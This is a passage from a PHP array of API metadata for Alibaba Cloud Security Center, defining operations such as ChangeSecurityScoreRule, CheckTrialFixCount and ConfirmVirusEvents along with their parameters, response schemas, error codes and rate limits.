], 'parameters' => [ [ 'name' => 'ConfigId', 'in' => 'query', 'schema' => ['description' => 'The ID of the scan scope configuration.'."\n" .'>Call the [GetCheckScopeConfig](~~GetCheckScopeConfig~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '00cfa8161da093089e6804ba6a33****', 'title' => ''], ], [ 'name' => 'AddAssetUuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of unique IDs of cloud assets to add.', 'type' => 'array', 'items' => ['description' => 'The unique ID of the cloud asset to add.'."\n" .'>Call the [ListCloudAssetInstances](~~ListCloudAssetInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '71a819cc12912de2345a1e7d1b9***-5*2', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'DeleteAssetUuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of unique IDs of cloud assets to delete.', 'type' => 'array', 'items' => ['description' => 'The unique ID of the cloud asset to delete.'."\n" .'>Call the [ListCloudAssetInstances](~~ListCloudAssetInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '71a819cc12912de2345a1e7d1b9***-5*2', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'ChangeCheckScopeConfigInstanceResponse', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique identifier that Alibaba Cloud generates for the request.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**: The request was successful.'."\n" .'- **false**: The request failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned by the operation.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned for the request.', 'type' => 'string', 'example' => 'There was an error with your request.', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify check scope configuration instance', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\",\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"There was an error with your request.\\"\\n}","type":"json"}]', ], 'ChangeSecurityScoreRule' => [ 'summary' => 'Modifies the details of the deduction modules of the security score feature, including custom settings.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '182573', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SecurityScoreRuleList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The information about the old version of the security score rule.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details of the security score rule.'."\n", 'type' => 'object', 'properties' => [ 'RuleType' => ['description' => 'The type of the security score rule. Valid values:'."\n" ."\n" .'* SS_REINFORCE: issue in key feature configuration'."\n" .'* SS_ALARM: unhandled alert'."\n" .'* SS_VUL: unfixed vulnerability'."\n" .'* SS_HC: baseline risk'."\n" .'* SS_CLOUD_HC: risk item of configuration assessment'."\n" .'* SS_AK: risk of AccessKey pair leaks'."\n", 'type' => 'string', 'required' => false, 'example' => 'SS_ALARM', 'title' => ''], 'Score' => ['description' => 'The deduction threshold of the deduction module.'."\n" ."\n" .'> Valid values: 0 to 100. The sum of the deduction thresholds for all deduction modules must be equal to 100.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'maximum' => '100', 'minimum' => '0', 'example' => '5', 'title' => ''], 'SecurityScoreItemList' => [ 'description' => 'The deduction items of the deduction module.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The deduction item of the deduction module.'."\n", 'type' => 'object', 'properties' => [ 'SubRuleType' => ['description' => 'The deduction item of the deduction module. The following list describes the deduction modules and their deduction items:'."\n" ."\n" .'* SS_REINFORCE: issue in key feature configuration'."\n" ."\n" .' * XPRESS_INSTALL: Security Center is not authorized.'."\n" .' * REINFORCE_SUSPICIOUS: The anti-virus feature is disabled.'."\n" .' * RANSOMWARE: The anti-ransomware policy is disabled.'."\n" .' * WEB_LOCK: The web tamper proofing feature is disabled.'."\n" .' * VIRUS_SCHEDULE_SCAN: The periodic virus scan policy is disabled.'."\n" .' * IMAGE_REPO_SCAN: The container image scan range is not configured.'."\n" .' * IMAGE_SCAN_TASK: The feature of one-click scan of container images for security risks is not performed.'."\n" ."\n" .'* SS_ALARM: unhandled alert'."\n" ."\n" .' * ALARM_SERIOUS: An unhandled high-risk alert event is detected.'."\n" .' * ALARM_SUSPICIOUS: An unhandled medium-risk alarm event is detected.'."\n" .' * ALARM_REMIND: An unhandled low-risk alarm event is detected.'."\n" ."\n" .'* SS_VUL: unfixed vulnerability'."\n" ."\n" .' * CMS_UNFIX: An unfixed Web-CMS vulnerability is detected.'."\n" .' * WIN_UNFIX: An unfixed Windows host vulnerability is detected.'."\n" .' * CVE_UNFIX: An unfixed Linux host vulnerability is detected.'."\n" .' * ERM_UNFIX: An unfixed emergency vulnerability is detected.'."\n" .' * ERM_UNCHECK: An undetected emergency vulnerability exists.'."\n" ."\n" .'* SS_HC: baseline risk'."\n" ."\n" .' * WEAK_EXPLOIT: Weak passwords are exposed to the Internet.'."\n" .' * WEAK_PASSWORD: Weak passwords exist.'."\n" .' * HC_EXPLOIT: The data source may be hacked.'."\n" .' * HC_OTHER_WARNING: Security configuration risks exist.'."\n" ."\n" .'* SS_CLOUD_HC: Cloud platform configuration check item problem.'."\n" ."\n" .' * CSPM_CIEM_NOT_PASS: A CIEM check item failed the check.'."\n" .' * CSPM_RISK_NOT_PASS: A security risk check item failed the check.'."\n" .' * CSPM_COMPLIANCE_NOT_PASS: A compliance check item failed the check.'."\n" ."\n" .'* SS_AK: risk of AccessKey pair leaks'."\n", 'type' => 'string', 'required' => false, 'example' => 'ALARM_SERIOUS', 'title' => ''], 'ScoreThreshold' => ['description' => 'The threshold for the deduction item.'."\n" ."\n" .'> Valid values: 0 to the deduction threshold of the deduction module.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'maximum' => '100', 'minimum' => '0', 'example' => '10', 'title' => ''], 'Score' => ['description' => 'The penalty point of the deduction item.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '5', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'SecurityScoreCategoryList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The information about the new version of the security score rule.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details of the security score rule.'."\n", 'type' => 'object', 'properties' => [ 'Category' => ['description' => 'The category of the security score rule. Valid values:'."\n" ."\n" .'* **SS_SAS_HANDLE**: security governance.'."\n" .'* **SS_SAS_RESPOND**: security response.'."\n", 'type' => 'string', 'required' => false, 'example' => 'SS_SAS_HANDLE', 'title' => ''], 'ScoreThreshold' => ['description' => 'The threshold of deduction for the security score rule type.'."\n" ."\n" .'> Valid values: 0 to 100. The sum of the deduction thresholds for all deduction modules must be equal to 100.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], 'SecurityRuleList' => [ 'description' => 'The deduction items of the security score rule.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The data of the security score rule type.'."\n", 'type' => 'object', 'properties' => [ 'RuleType' => ['description' => 'The deducted module that is supported by the security score feature. The type of the sub-deduction item. Valid values:'."\n" ."\n" .'* **SS_SAS_WEAK_PW**: unhandled weak password risk.'."\n" .'* **SS_SAS_ALARM**: unhandled alert in Security Center.'."\n" .'* **SS_SAS_EMG_VUL**: unfixed urgent vulnerability.'."\n" .'* **SS_SAS_APP_VUL**: unfixed application vulnerability.'."\n" .'* **SS_SAS_SYS_VUL**: unfixed system vulnerability.'."\n" .'* **SS_SAS_CLOUD_HC**: unhandled cloud security posture management (CSPM) risk.'."\n" .'* **SS_SDDP_DATA_RISK**: unhandled data security risk.'."\n" .'* **SS_WAF_API_RISK**: unhandled API security risk.'."\n" .'* **SS_DDOS_BH_ASSET**: asset on which blackhole filtering is triggered.'."\n" .'* **SS_SAS_AK_LEAK**: unhandled AK/SK leak event.'."\n" .'* **SS_PRODUCT_CONNECT**: security service not integrated.'."\n" .'* **SS_KEY_CONFIG**: key feature configuration.'."\n" .'* **SS_PRODUCT_EXPIRE**: service that is about to expire.'."\n" .'* **SS_AI_RISK**: AI application risk.'."\n", 'type' => 'string', 'required' => false, 'example' => 'SS_REINFORCE', 'title' => ''], 'Score' => ['description' => 'The threshold of deduction for the security score rule type.'."\n" ."\n" .'> Valid values: 0 to the deduction threshold of the deduction module.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], 'SecurityScoreItemList' => [ 'description' => 'The sub-deduction items of the security score rule.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The sub-deduction item of the security score rule.'."\n", 'type' => 'object', 'properties' => [ 'SubRuleType' => ['description' => 'The sub-deduction item of the security score rule.'."\n", 'type' => 'string', 'required' => false, 'example' => 'SSI_KEY_CONFIG', 'title' => ''], 'Score' => ['description' => 'The penalty point of the deduction item.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], 'ScoreThreshold' => ['description' => 'The threshold for the deduction item.'."\n" ."\n" .'> Valid values: 0 to the deduction threshold of the deduction module.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '5', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 5, 'title' => '', 'example' => '', ], ], [ 'name' => 'ResetSecurityScoreRule', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to reset to the system default rule. Valid values:'."\n" ."\n" .'* true: yes'."\n" .'* false: no'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'CalType', 'in' => 'query', 'schema' => ['description' => 'The old or new version of the security score rule. If you set this parameter to **home_security_score**, the new version of the security score rule is changed. Otherwise, the old version of the security score rule is changed by default.'."\n", 'type' => 'string', 'required' => false, 'example' => 'home_security_score', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '23AD0BD2-8771-5647-819E-6BA51E21****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"23AD0BD2-8771-5647-819E-6BA51E21****\\"\\n}","type":"json"}]', 'title' => 'ChangeSecurityScoreRule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '3', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ChangeSecurityScoreRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ChangeSecurityScoreRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ChangeUserLang' => [ 'summary' => 'Modifies the language settings of log analysis. The modification on the language settings takes effect within 12 hours and affects only the language of the descriptions for security events in security logs.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '168490', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'UserLang', 'in' => 'query', 'schema' => ['description' => 'The new language. Valid values:'."\n" ."\n" .'* zh: Chinese'."\n" .'* en: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '2F5AA940-9EBF-5948-ACE7-3EF0FE54****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"2F5AA940-9EBF-5948-ACE7-3EF0FE54****\\"\\n}","type":"json"}]', 'title' => 'ChangeUserLang', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ChangeUserLang'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ChangeUserLang', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CheckSecurityEventId' => [ 'summary' => 'Checks whether one or more alerts are generated on a specified server based on alert IDs.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '91913', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => true, 'example' => '96ad2473-bc60-45ba-ad1c-932e2866****', 'title' => ''], ], [ 'name' => 'SecurityEventIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of alert events. You can specify up to 100 IDs. If you do not specify this parameter, the value of the response parameter **Data** is **false**. The value false indicates that no alert events are generated on the server.'."\n" ."\n" .'> You can call the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation to query the IDs of alert events.', 'type' => 'array', 'items' => ['description' => 'The IDs of alert events. You can specify up to 100 IDs. If you do not specify this parameter, the value of the response parameter **Data** is **false**. The value false indicates that no alert events are generated on the server.'."\n" ."\n" .'> You can call the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation to query the IDs of alert events.', 'type' => 'string', 'required' => false, 'example' => '24376', 'title' => ''], 'required' => false, 'example' => '["1234567","98765432"]', 'maxItems' => 100, 'title' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'Indicates whether the alert events are generated on the server. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '1383B0DB-D5D6-4B0C-9E6B-75939C8E67FE', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"Data\\": true,\\n \\"RequestId\\": \\"1383B0DB-D5D6-4B0C-9E6B-75939C8E67FE\\"\\n}","errorExample":""},{"type":"xml","example":"\\n 1383B0DB-D5D6-4B0C-9E6B-75939C8E67FE\\n true\\n","errorExample":""}]', 'title' => 'CheckSecurityEventId', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CheckSecurityEventId'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:CheckSecurityEventId', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CheckStsTokenAuth' => [ 'summary' => 'Checks a Security Token Service (STS) token and returns the ID of the Alibaba Cloud account.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '151356', 'abilityTreeNodes' => ['FEATUREsasA217JR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The ID of the Alibaba Cloud account.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '185685871307****', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '898F7AA7-CECD-5EC7-AF4D-664C601B****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": 0,\\n \\"RequestId\\": \\"898F7AA7-CECD-5EC7-AF4D-664C601B****\\"\\n}","type":"json"}]', 'title' => 'CheckStsTokenAuth', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CheckStsTokenAuth'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:CheckStsTokenAuth', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CheckTrialFixCount' => [ 'summary' => 'Checks whether the remaining quota of the vulnerability fixing feature is sufficient for a free trial user of Security Center and queries the quota usage required for the current fix operation.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '91914', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the vulnerability that you want to fix. Valid values:'."\n" ."\n" .'* **cve**: Linux software vulnerability.'."\n" .'* **sys**: Windows system vulnerability.'."\n" .'* **cms**: Web-CMS vulnerability.'."\n", 'type' => 'string', 'required' => true, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'Info', 'in' => 'query', 'schema' => ['description' => 'The information about the vulnerability. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **name**: the name of the vulnerability.'."\n" ."\n" .'* **uuid**: the UUID of the server on which the vulnerability is detected.'."\n" ."\n" .'* **tag**: the tag that is added to the vulnerability. Valid values:'."\n" ."\n" .' * **oval**: Linux software vulnerability.'."\n" .' * **system**: Windows system vulnerability.'."\n" .' * **cms**: Web-CMS vulnerability.'."\n" ."\n" .'> You must specify a value for Info or values for VulNames and Uuids to identify a vulnerability.'."\n", 'type' => 'string', 'required' => false, 'example' => '[{\\"name\\":\\"oval:com.redhat.rhsa:def:20192143\\",\\"uuid\\":\\"80ee3226-1f96-4da0-a3ed-55c104e2****\\",\\"tag\\":\\"oval\\"}]', 'title' => ''], ], [ 'name' => 'VulNames', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The names of the vulnerabilities.'."\n", 'type' => 'array', 'items' => ['description' => 'The name of the vulnerability that you want to fix.'."\n", 'type' => 'string', 'required' => false, 'example' => 'oval:com.redhat.rhsa:def:20192143', 'title' => ''], 'required' => false, 'maxItems' => 10000, 'title' => '', 'example' => '', ], ], [ 'name' => 'Uuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of the servers.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '95e8b759-44d7-4eb1-bb95-2b2d3b37****', 'title' => ''], 'required' => false, 'maxItems' => 10000, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], 'isTrial' => ['description' => 'Indicates whether Security Center is in free trial. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'ExpendCount' => ['description' => 'The quota usage required for the current fix operation.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'RemainCount' => ['description' => 'The quota that remains after the current fix operation is complete.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RepairedCount' => ['description' => 'The number of the vulnerabilities that are fixed.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'CanFix' => ['description' => 'Indicates whether the vulnerability can be fixed. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\",\\n \\"isTrial\\": true,\\n \\"ExpendCount\\": 10,\\n \\"RemainCount\\": 0,\\n \\"RepairedCount\\": 10,\\n \\"CanFix\\": true\\n}","type":"json"}]', 'title' => 'CheckTrialFixCount', 'description' => 'You can call this operation to check whether the remaining quota of the vulnerability fixing feature is sufficient in free trial scenarios. This operation does not trigger vulnerability fixing.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CheckTrialFixCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:CheckTrialFixCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CheckUserHasEcs' => [ 'summary' => 'Checks whether Elastic Compute Service (ECS) instances exist.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'none', 'tenantRelevance' => 'publicInformation'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'Indicates whether ECS instances exist. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Success' => ['description' => 'The status of the request. Valid values:'."\n" ."\n" .'* **true**: The request is successful.'."\n" .'* **false**: The request fails.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request is successful. Other status codes indicate that the request fails. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The error message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578ABF384', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": true,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578ABF384\\"\\n}","type":"json"}]', 'title' => 'CheckUserHasEcs', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CheckUserHasEcs'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:CheckUserHasEcs', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ConfirmVirusEvents' => [ 'summary' => 'Confirms the alert events that you want to handle.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '91915', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'OperationCode', 'in' => 'query', 'schema' => ['description' => 'The operation that you want to perform on the alert events. Valid values:'."\n" ."\n" .'* **default**: performs in-depth detection and removal'."\n" .'* **ignore**: ignores the alert event'."\n" .'* **advance\\_mark\\_mis_info**: adds the alert events to the whitelist'."\n" .'* **manual_handled**: marks the alert events as manually handled', 'type' => 'string', 'required' => true, 'example' => 'default', 'title' => ''], ], [ 'name' => 'OperationRange', 'in' => 'query', 'schema' => ['description' => 'The server on which you want to perform the alert events.'."\n", 'type' => 'string', 'required' => false, 'example' => '[{\\"type\\":\\"machine\\",\\"list\\":[\\"3aedba3d-bd4d-4dfb-bb0d-xxxxxxxxxxxx\\"]}]', 'title' => ''], ], [ 'name' => 'OperationAll', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to handle all alert events. Valid values:'."\n" ."\n" .'* **1**: yes'."\n" .'* **0**: no'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Result' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* true: The request was successful.'."\n" .'* false: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => '5DFD6277-CC36-57F7-ACE6-F5952XXXXXXXX', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], 